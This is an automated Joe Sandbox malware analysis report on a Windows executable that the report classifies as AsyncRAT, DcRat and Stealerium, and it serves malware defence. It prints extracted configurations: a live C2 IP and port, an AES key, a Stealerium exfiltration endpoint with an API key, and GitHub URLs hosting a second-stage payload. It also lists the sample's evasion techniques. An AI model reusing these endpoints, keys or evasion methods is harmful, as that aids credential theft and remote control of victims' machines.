Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lu4421.exe

Overview

General Information

Sample name:Lu4421.exe
Analysis ID:1577337
MD5:e5358fca58c0e1b1e29eb195fb0f4675
SHA1:a114c059fed08a501c344f40d9f702f03cdebbab
SHA256:220c04c30a7dbd084fdebe00102f6340194845d8664dfd669a5549f23a1031c4
Tags:18521511316185215113209bulletproofexeStealeriumStealeruser-abus3reports
Infos:

Detection

AsyncRAT, DcRat, Stealerium
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM5
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Stealerium
Yara detected Telegram Recon
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Lu4421.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\Lu4421.exe" MD5: E5358FCA58C0E1B1E29EB195FB0F4675)
    • svchost.exe (PID: 480 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 67CA41C73D556CC4CFC67FC5B425BBBD)
    • WerFault.exe (PID: 1060 cmdline: C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
StealeriumAccording to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actors addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium

Malware Configuration

Threatname: AsyncRAT

{"Server": "51.89.44.68", "Ports": "8848", "Version": "1.0.7", "Autorun": "true", "Install_Folder": "%Temp%", "Install_File": "svchost.exe", "AES_key": "codpZo7sp26vCJaNdBX6AeJsQEdcysZj", "Mutex": "etb3t1tr5n", "Certificate": "MIICKzCCAZSgAwIBAgIVALyXBdFrd+RZ3+qdeoUf09MOZZyjMA0GCSqGSIb3DQEBDQUAMF8xEDAOBgNVBAMMB2RlZWphdnUxEzARBgNVBAsMCnF3cWRhbmNodW4xHDAaBgNVBAoME0RjUmF0IEJ5IHF3cWRhbmNodW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAyMjYwODM2NDhaFw0zNDEyMDUwODM2NDhaMBAxDjAMBgNVBAMMBURjUmF0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYBG4He/Q574HZ/APM0iLczQinqsYye5ejH4+Jn4a0H0XcUp2t1cZHExpOhz+AXul1Fyc5dqej9DWa2LiOIhAF+QVi9kEpiQ7oROO3aBA18ZAYMZEF7p5Cc9nESq7avNFBO9H0MoFM/NkjnzQVrnirOGOWCvQzvQNni4h+GAwmPQIDAQABozIwMDAdBgNVHQ4EFgQUUk4Zkw0pZ4X7HPoUbKwU1AM6ZigwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQCLbPZDeVM0uVz5aGQdtliw6JbM+hLM6ViT0x1ekLT3Vys6KbotH2TC/sJph0XR1aLuiVZTh907AgwE7wK8wuBNEcyqYxbYslxK783vmPNZnU8wTI2Mf5hvsxIftwD6jj2bQrs7iNE2R8kA0cr6M5X30OZAVJtbfHx+KaA4bhvT0g==", "ServerSignature": "TgOPkoSwK50ROL73TIpqMjhVitaE57QcwTult9vLNILRIrVCY/vBZYLwQCNT33NmMQG0jNBBHbvw/4wy7BckYa8zQCUKS+IAyG6llcuwMMlU90EILj05Fxf+hcTpljihzyJLdY/g7vGbQp50Ejelt1z28kvim/7J2Kobrr6sanM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "true"}

Threatname: Stealerium

{"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Lu4421.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    Lu4421.exeJoeSecurity_StealeriumYara detected StealeriumJoe Security
      Lu4421.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Lu4421.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Lu4421.exeJoeSecurity_AntiVM_5Yara detected AntiVM_5Joe Security
            Click to see the 1 entries

            PCAP (Network Traffic)

            SourceRuleDescriptionAuthorStrings
            dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
            • 0x20e08:$b2: DcRat By qwqdanchun1

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              C:\Users\user\AppData\Local\Temp\svchost.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
              • 0xd0ba:$q1: Select * from Win32_CacheMemory
              • 0xd0fa:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
              • 0xd148:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
              • 0xd196:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
              C:\Users\user\AppData\Local\Temp\svchost.exeINDICATOR_SUSPICIOUS_EXE_DcRatByDetects executables containing the string DcRatByditekSHen
              • 0xd6f6:$s1: DcRatBy

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DcRat_2Yara detected DcRatJoe Security
                00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
                • 0x3e43:$b2: DcRat By qwqdanchun1
                • 0xbb0f:$b2: DcRat By qwqdanchun1
                • 0xbd57:$b2: DcRat By qwqdanchun1
                00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_DCRat_1aeea1acunknownunknown
                • 0x15e4b:$b2: DcRat By qwqdanchun1
                • 0x169e7:$b2: DcRat By qwqdanchun1
                00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_5Yara detected AntiVM_5Joe Security
                    Click to see the 25 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    1.0.svchost.exe.dd0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      1.0.svchost.exe.dd0000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                      • 0xd0ba:$q1: Select * from Win32_CacheMemory
                      • 0xd0fa:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                      • 0xd148:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                      • 0xd196:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                      1.0.svchost.exe.dd0000.0.unpackINDICATOR_SUSPICIOUS_EXE_DcRatByDetects executables containing the string DcRatByditekSHen
                      • 0xd6f6:$s1: DcRatBy
                      0.2.Lu4421.exe.15b64564428.2.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                        0.2.Lu4421.exe.15b64564428.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0xd0ba:$q1: Select * from Win32_CacheMemory
                        • 0xd0fa:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0xd148:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0xd196:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                        Click to see the 15 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Lu4421.exe, ProcessId: 6768, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
                        Sigma detected: System File Execution Location Anomaly
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Lu4421.exe", ParentImage: C:\Users\user\Desktop\Lu4421.exe, ParentProcessId: 6768, ParentProcessName: Lu4421.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 480, ProcessName: svchost.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Lu4421.exe", ParentImage: C:\Users\user\Desktop\Lu4421.exe, ParentProcessId: 6768, ParentProcessName: Lu4421.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 480, ProcessName: svchost.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Lu4421.exe", ParentImage: C:\Users\user\Desktop\Lu4421.exe, ParentProcessId: 6768, ParentProcessName: Lu4421.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 480, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-18T12:07:32.534040+010028424781Malware Command and Control Activity Detected51.89.44.688848192.168.2.449739TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-18T12:07:27.709803+010028033053Unknown Traffic192.168.2.449737185.199.108.133443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Found malware configuration
                        Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Stealerium {"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
                        Source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "51.89.44.68", "Ports": "8848", "Version": "1.0.7", "Autorun": "true", "Install_Folder": "%Temp%", "Install_File": "svchost.exe", "AES_key": "codpZo7sp26vCJaNdBX6AeJsQEdcysZj", "Mutex": "etb3t1tr5n", "Certificate": "MIICKzCCAZSgAwIBAgIVALyXBdFrd+RZ3+qdeoUf09MOZZyjMA0GCSqGSIb3DQEBDQUAMF8xEDAOBgNVBAMMB2RlZWphdnUxEzARBgNVBAsMCnF3cWRhbmNodW4xHDAaBgNVBAoME0RjUmF0IEJ5IHF3cWRhbmNodW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDAyMjYwODM2NDhaFw0zNDEyMDUwODM2NDhaMBAxDjAMBgNVBAMMBURjUmF0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYBG4He/Q574HZ/APM0iLczQinqsYye5ejH4+Jn4a0H0XcUp2t1cZHExpOhz+AXul1Fyc5dqej9DWa2LiOIhAF+QVi9kEpiQ7oROO3aBA18ZAYMZEF7p5Cc9nESq7avNFBO9H0MoFM/NkjnzQVrnirOGOWCvQzvQNni4h+GAwmPQIDAQABozIwMDAdBgNVHQ4EFgQUUk4Zkw0pZ4X7HPoUbKwU1AM6ZigwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQCLbPZDeVM0uVz5aGQdtliw6JbM+hLM6ViT0x1ekLT3Vys6KbotH2TC/sJph0XR1aLuiVZTh907AgwE7wK8wuBNEcyqYxbYslxK783vmPNZnU8wTI2Mf5hvsxIftwD6jj2bQrs7iNE2R8kA0cr6M5X30OZAVJtbfHx+KaA4bhvT0g==", "ServerSignature": "TgOPkoSwK50ROL73TIpqMjhVitaE57QcwTult9vLNILRIrVCY/vBZYLwQCNT33NmMQG0jNBBHbvw/4wy7BckYa8zQCUKS+IAyG6llcuwMMlU90EILj05Fxf+hcTpljihzyJLdY/g7vGbQp50Ejelt1z28kvim/7J2Kobrr6sanM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "true"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeReversingLabs: Detection: 84%
                        Multi AV Scanner detection for submitted file
                        Source: Lu4421.exeReversingLabs: Detection: 68%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: Lu4421.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: Lu4421.exeString decryptor:
                        Source: Lu4421.exeString decryptor:
                        Source: Lu4421.exeString decryptor:
                        Source: Lu4421.exeString decryptor:
                        Source: Lu4421.exeString decryptor:
                        Source: Lu4421.exeString decryptor: https://api.telegram.org/bot
                        Source: Lu4421.exeString decryptor: https://szurubooru.zulipchat.com/api/v1/messages
                        Source: Lu4421.exeString decryptor: szurubooru@gmail.com
                        Source: Lu4421.exeString decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
                        Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Management.pdbHl source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed source: Lu4421.exe
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: !costura.polly.core.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: re.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\Desktop\Lu4421.PDB source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceProcess.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb:l source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: mscorlib.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.ServiceProcess.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Xml.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdbpHN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Xml.pdb* source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: Lu4421.exe
                        Source: Binary string: System.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: Lu4421.exe, Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: System.Net.Http.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: PresentationFrameworkib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C880000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: Lu4421.exe
                        Source: Binary string: mscorlib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Net.Http.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: Lu4421.exe
                        Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: Lu4421.exe
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: Lu4421.exe
                        Source: Binary string: System.Core.pdbk source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 51.89.44.68:8848 -> 192.168.2.4:49739
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 51.89.44.68 8848Jump to behavior
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://szurubooru.zulipchat.com/api/v1/messages
                        Source: global trafficTCP traffic: 192.168.2.4:49739 -> 51.89.44.68:8848
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /kgnfth/tumblr/raw/refs/heads/main/svchost.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
                        Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                        Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                        Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
                        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 185.199.108.133:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
